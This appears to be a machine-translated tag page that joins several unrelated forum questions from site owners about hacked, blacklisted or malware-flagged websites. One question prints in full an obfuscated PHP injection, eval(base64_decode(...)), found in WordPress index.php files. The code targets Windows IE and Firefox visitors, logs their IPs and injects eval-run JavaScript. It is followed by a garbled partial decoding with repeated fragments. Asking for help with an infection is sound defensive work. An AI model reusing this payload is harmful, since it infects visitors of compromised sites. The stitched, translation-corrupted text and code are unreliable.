問題タブ [malware]

私のウェブサイトにはマルウェアがあったため、FB はそれをブラックリストに載せ、私のウェブサイトへのリンクを Google にリダイレクトしました。しかし、今では私のサイトはきれいです (Google ウェブマスター ツールと Sucuri でチェックしましたが、私のリンクはまだ機能しません。ホワイトリストに登録するか、少なくともブラックリストから削除するにはどうすればよいですか?

これに関するいくつかの記事（たとえば、QRコードがマルウェアを配信する方法）を読みましたが、非常に話題になっているようです。

私が読んだところによると、いわゆる「マルウェア」はすべて、悪意のあるWebstieまたはアプリへのリンクです。私の質問は：QRコードマルウェアの他の形式はありますか？そうでない場合、このタイプのマルウェアの新機能は何ですか？

悪意のあるコードからシェルコードを抽出したマルウェア（Blackhole Exploit）の動作を学んでいます。バイト文字列の検索以外のすべてを理解しました。誰かがこれについて私を助けることができますか？このシェルコード（ほとんどの悪意のあるシェルコード）がこの特定の文字列を検索するのはなぜですか？検索コードは次のようになります。

昨日、自分のサイトの 1 つにアクセスしたときに、サイトにマルウェアがあるという警告を Google から受け取りました。私はコードを見て、確かにそこにあるべきではないいくつかのJavaScriptがありました。私はそれをグーグルで検索しましたが、有用なものは何も見つかりませんでした。サイトに戻ったとき、そのコードは消えていましたが、Google (検索エンジンからサイトにアクセスするとき) と Google Chrome は、サイトにマルウェアがあるという警告を表示します。

ウェブマスター ツールを調べたところ、問題のあるページはほとんど見つかりませんでした。それらの 1 つがhttp://www.keramikfliesen.com/schweiz/rimini/です。ウェブマスター ツールのマルウェアの下に表示されるコードは次のとおりです。

助けてもらえますか？これどう戦えばいいの？

事前にお世話になりました皆様、誠にありがとうございました！

シンプルなファイル アップロード スクリプトを使用しています。このスクリプトではファイル タイプのフィルタリングが可能ですが、どのファイルを許可/禁止する必要があるかわかりません。

アップロードされないようにする必要があるファイルの種類は何ですか?

最近、サーバーにインストールされているすべてのWordPressのindex.phpテンプレートファイルにこのコードが挿入されていることがわかりました。<?php eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTskZGJmPSRkci4nLycubWQ1KCRkcik7DQppZigoc3RycG9zKCR1YSwnV2luZG93cycpIT09ZmFsc2UpJiYoKHN0cnBvcygkdWEsJ01TSUUnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKSkmJihzdHJwb3MoQGZpbGVfZ2V0X2NvbnRlbnRzKCRkYmYpLCRpcCkgPT09IGZhbHNlKSl7DQoJZXJyb3JfcmVwb3J0aW5nKDApOw0KCWVjaG8oYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkRDUwY25sN01TMXdjbTkwYjNSNWNHVTdmV05oZEdOb0tHRnpaQ2w3ZUQweU8zMGdhV1lvZUNsN1puSTlJbVp5YjIxRGFHRnlJanRtUFZzd0xDMHhMRGswTERrekxESXlMREk1TERreExERXdNU3c0T0N3eE1EZ3NPVGtzT1RBc01UQXhMREV3Tml3ek5TdzVOQ3c1TVN3eE1EVXNOakFzT1Rnc09UQXNNVEF3TERreExEazVMREV3Tnl3eE1EVXNOVFVzTVRFeUxEYzBMRGcyTERrMExEWTRMRGcyTERFd01DdzVNU3d5T1N3ek1DdzRPQ3d4TURBc09URXNNVEV4TERJNExETXlMRGd4TERNM0xEZzBMRE14TERFeE1pdzBMQzB4TEMweUxEQXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXcwT1N3eUxEQXNMVEVzTVRFMExESXpMRGt4TERrM0xERXdOaXc1TVN3eU1Td3hNVFFzTXl3dE1pd3dMQzB4TERnNUxERXdNaXc0T1N3eE1EWXNNVEF3TERreExEazVMREV3Tnl3ek5pd3hNRGdzTVRBMUxEazFMREV3TlN3NU1pd3pNQ3d5TXl3MU1TdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNNaklzTVRBMExERXdOU3c0T1N3MU1Dd3pNQ3c1TkN3eE1EVXNNVEEzTERFd01pdzBOeXd6T0N3ek55dzRPU3d4TVRFc01UQXlMREV3TkN3NU55d3hNRGNzT1RNc01UQTVMRGszTERNMUxERXdNQ3d4TVRFc09URXNNVEV3TERNMkxERXdOaXd4TURZc016Y3NOVElzT1RRc01UQXhMRFV3TERReExESTVMREl4TERFeE1DdzVOU3c0T1N3eE1EY3NPVFFzTlRBc016QXNNemtzTXpjc016QXNNaklzT1RNc09USXNPVFVzT1RJc09UVXNNVEEyTERVd0xETXdMRE01TERNM0xETXdMREl5TERFd05Dd3hNRGNzTVRFeExEazNMRGt5TERVeExESTRMREV3T1N3NU5Td3hNRFFzT1RZc09EZ3NPVFFzT1Rrc09UVXNNVEExTERFeE1pdzBPQ3c1TXl3NU5pdzVNQ3c0T1N3NU1pd3hNREFzTkRnc01UQXpMREV3TVN3eE1EUXNPVFlzTVRBMkxEazBMREV3TWl3eE1EQXNORGNzT0Rnc09EZ3NNVEEwTERFd01pdzVPQ3d4TURZc01UQTNMRGt4TERRNExEazVMRGt4TERreExERXdOeXcwT0N3ek55dzFNQ3d4TURZc01UQXdMREV3TXl3ME9Dd3pOeXcxTUN3eU9TdzFNU3cxTVN3ek55dzVOQ3c1TXl3eE1EUXNPRFlzTVRBd0xEa3hMRFV4TERJMUxETXhMRFE0TERRc0xURXNMVElzTVRFMkxETXNMVElzTUN3NU1pd3hNRFlzTVRBeExEZzVMREV3TlN3NU5pd3hNREVzT1Rrc01qTXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXd4TVRNc01pd3dMQzB4TEMweUxERXdPU3c0Tnl3eE1ETXNNak1zT1RJc01qRXNOVElzTWpJc09Ea3NNVEF5TERnNUxERXdOaXd4TURBc09URXNPVGtzTVRBM0xETTJMRGc0TERFd05TdzVNU3c0Tml3eE1EY3NPVEVzTlRnc09Ua3NPVEVzT1Rnc09USXNNVEF3TERFd05Td3pNU3d5T1N3NU5DdzVNeXd4TURRc09EWXNNVEF3TERreExESTRMRE15TERRNUxEa3hMRE0zTERFd05TdzVNQ3d4TURjc05UVXNNVEExTERFd055d3hNRFFzT1RRc09Ea3NNVEEzTERFd05TdzVNaXd6TUN3eU9Dd3hNRFlzTVRBMExEZzRMRE13TERNMExESTRMRGsxTERFd05pd3hNRFVzTVRBekxEUTRMRE0yTERNNExEa3dMREV3T1N3eE1ETXNNVEExTERrMUxERXdPQ3c1TkN3eE1EY3NPVGdzTXpZc09UZ3NNVEV5TERreUxERXdPQ3d6Tnl3eE1EY3NNVEEwTERNNExEVXpMRGt5TERFd01pdzFNU3d6T1N3ek1Dd3pNU3cwT0N3NU15d3pOaXd4TURRc01UQTNMREV4TVN3NU55dzVNaXd6Tml3eE1EY3NPVFlzTVRBMUxEazBMRGc1TERrMUxEazNMRGsyTERFd05pd3hNVEFzTlRJc01qa3NPVE1zT1RZc09UQXNPRGtzT1RJc01UQXdMREk0TERVd0xEa3lMRE0xTERFd05pd3hNRFlzTVRFd0xEazVMRGt4TERNMUxERXdNeXd4TURFc01UQTBMRGsyTERFd05pdzVOQ3d4TURJc01UQXdMRFV3TERNd0xEZzNMRGczTERFd05pd3hNREVzT1Rjc01UQTRMREV3Tml3NU1Dd3pNQ3cwT1N3NU1Td3pOeXd4TURVc01UQTFMREV4TWl3NU9DdzVNQ3d6Tnl3NU9DdzVNQ3c1TXl3eE1EWXNOVEFzTXpBc016Z3NNamdzTlRBc09USXNNelVzTVRBMkxERXdOaXd4TVRBc09Ua3NPVEVzTXpVc01UQTNMREV3TVN3eE1ERXNOVElzTWprc016Y3NNekFzTkRrc09URXNNemNzTVRBMUxEa3dMREV3Tnl3MU5Td3hNRFVzTVRBM0xERXdOQ3c1TkN3NE9Td3hNRGNzTVRBMUxEa3lMRE13TERJNExERXhNQ3c1TlN3NE9Td3hNRGNzT1RRc01qZ3NNelVzTWprc016Z3NNemtzTWprc016QXNOVEFzT1RJc016VXNNVEEyTERreExERXdOU3cxTml3eE1EWXNNVEExTERFd05TdzVOU3c0Tnl3eE1EZ3NNVEEyTERrd0xETXhMREk1TERrekxEa3lMRGsxTERreUxEazFMREV3Tml3eU9Dd3pOU3d5T1N3ek9Dd3pPU3d5T1N3ek1DdzFNQ3d6TEMweUxEQXNMVEVzT0Rrc01UQXlMRGc1TERFd05pd3hNREFzT1RFc09Ua3NNVEEzTERNMkxEa3lMRGt5TERFd05pdzFPQ3c1T1N3NU1TdzVPQ3c1TWl3eE1EQXNNVEExTERFd05pdzFOaXd4TVRBc056VXNPRGNzT1RJc05qa3NPRGNzT1Rnc09USXNNekFzTWpnc09Ea3NNVEF4TERnNUxERXhNaXd5T1N3ek1DdzRNaXd6T0N3NE1pd3pOeXc0Tnl3eE1ERXNNVEF6TERreExEazVMRGt4TERVM0xEa3pMRGsyTERrNExEZzVMRE14TERreUxETXdMRFV3TERNc0xUSXNNQ3d4TVRWZE8zWTlJbVYyWVNJN2ZXbG1LSFlwWlQxM2FXNWtiM2RiZGlzaWJDSmRPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5PM285S0NobEtUOGlRMjlrWlNJNklpSXBPM3A0UFdaeUszbzdabTl5S0drOU1EczFOamt0TlNzMUxXaytNRHRwS3oweEtYdHFQV2s3YVdZb1pTbHpQWE1yY2x0NmVGMG9LSGRiYWwwcU1Tc29PU3RsS0NKcUpUTWlLU2twS1R0OUlHbG1LSGdtSm1ZbUpqQXhNajA5UFRFd0tXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KCWlmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>

通常、base64デコードを実行するのは簡単ですが、再度エンコードされたと思います。

base64デコードから得られるものは

if（（strpos（$ ua、'Windows'）！== false）&&（（strpos（$ ua、'MSIE'）！== false）||（strpos（$ ua、'Firefox'）！== false ））&&（strpos（@file_get_contents（$ dbf）、$ ip）=== false））{error_reporting（0）;

try {1-prototype;} catch（asd）{x = 2;} if（x）{fr = "fromChar"; f = [0、-1,94,93,22,29,91,101,88,108,99、 90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84、 31,112,4、-1、-2,0,95,91,105,87,98,92,104,29,32,49,2,0、-1,114,23,91,97,106,91,21,114,3、-2、 0、-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37 、89,111,102,104,97,107,93,109,97,35,100,111,91,110,36,106,106,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92 、95,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100 、48,103,101,104,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100 、91,51,25,31,48,4、-1、-2,116,3、-2,0,92,106,101,89、105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2,0、-1、-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91、 99,107,36,88,105,91,86,107,91,58,99,91,98,92,100,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94、 89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48,36,38,90,109,103,105,95,108,94,107,98,36,98,112,92,108,37,107,104,38,53,92,102,51,39、 30,31,48,93,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110、 99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106,90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28、 50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35、 29,38,39,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29、38,39,29,30,50,3、-2,0、-1,89,102,89,106,100,91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87、 92,69,87,98,92,30,28,89,101,89,112,29,30,82,38,82,37,87,101,103,91,99,91,57,93,96,98,89,31、 92,30,50,3、-2,0,115]; v = "eva";} if（v）e = window [v + "l"]; w = f; s = []; r = String; z = （（e）？ "Code"： ""）; zx = fr + z; for（i = 0; 569-5 + 5-i> 0; i + = 1）{j = i; if（e）s = s + r [zx]（（w [j] * 1 +（9 + e（ "j％3"））））;} if（x && f && 012 === 10）e（s）;j％3 "））））;} if（x && f && 012 === 10）e（s）;j％3 "））））;} if（x && f && 012 === 10）e（s）;

}

マルウェアが何をしようとしているのかを理解するのを手伝ってくれませんか

ありがとう

サーバー内のすべてのインデックス ファイルに次のコードがあることに気付きました。これをデコードする方法を知りたいです。誰がこのコードの背後にいるのかを見つけますか? これをデコードする方法を教えてください。

過去数週間、半定期的に、このWebサイトの.phpファイルの一部に＃c3284d＃マルウェアコードが挿入されています。また、.htaccessファイルには同等のコードが挿入されていました。多くの場合、悪意のあるコードを削除し、ファイルを置き換え、ftpクライアント（CoreFTP）のftpパスワードを変更し、接続方法をFTPSに変更して、パスワードを（プレーンテキストではなく）より安全に保存しました。

また、AVGとWindows Defenderを使用してコンピューターを数回スキャンしましたが、FTPパスワードを保存している可能性のあるマルウェアはコンピューター上に見つかりませんでした。

Sucuri SiteCheckを使用して、自分のWebサイトにマルウェアがないことを確認しました。これは、1分前にサイト上のリンクのいずれかをクリックしようとしたところ、これらのランダムなstats.phpサイトの別のサイトにリンクされたためです。 ＃c3284d＃コードを再度削除したように見えますが（1時間ほどで再挿入されることは間違いありません）。

誰かがこのマルウェアハッキングの実際の実行可能な解決策を見つけましたか？

私はこことここで提案されたほとんどすべてのことを実行しましたが、問題はまだ解決していません。

現在、Google Chrome内のサイトナビゲーションメニュー内のリンクをクリックすると、googlesマルウェア警告ページが表示されます。

警告：何かがここにありません！oxsanasiberians.comにはマルウェアが含まれています。このサイトにアクセスすると、コンピュータがウイルスに感染する可能性があります。続行すると、悪意のあるソフトウェアがコンピュータにインストールされている可能性があることがGoogleによって検出されました。過去にこのサイトにアクセスしたことがある場合、またはこのサイトを信頼している場合は、最近ハッカーによって侵害された可能性があります。先に進まないでください。明日もう一度やり直したり、どこかに行ってみませんか？サイトでマルウェアが見つかったことは、すでにoxsanasiberians.comに通知されています。oxsanasiberians.comで見つかった問題の詳細については、Googleセーフブラウジング診断ページにアクセスしてください。

私のサイトはハッキングされており、それが注入された場所を一生見つけることができません。二度と起こらないように必要な予防策を講じており、バックアップから以前の時間にサイトを復元していますが、ホストしている別のサイトで発生した場合に備えて、どこにあるか知りたいです。

これは悪意のあるスクリプトです：http：//www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js

これはサイトです:(今削除されました）

私はそれをどこでもチェックしましたが、成功していません。

どんな助けでも大歓迎です。

ありがとうございました。

**私に反対票を投じた方のために、私は過去4時間にわたって、11か月の膝の上でこれを自分で修正しようとすることについて、多くの調査を行いました。私は自分でそれをすることに成功しなかったので、最後の手段として質問を投稿しただけです。過去にここの人たちから大いに助けられたので、聞いても大丈夫だと思いました。

私のjoomlaサイトはいくつかのマルウェアに感染していますが、これを取り除く方法がわかりません。サイトに表示されることがありますが、サイトのgoogleキャッシュには表示されます。以下は、GoogleキャッシュWebサイトのリンクです： http ：//webcache.googleusercontent.com/search？q = cache：V5KCr9zRmCkJ：www.highwaysafetygroup.com/index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D64%26Itemid ％3D70 +＆cd = 6＆hl = en＆ct = clnk＆client = firefox-a

以下は実際のサイトリンクです：www.highwaysafetygroup.com

何か助けてもらえますか？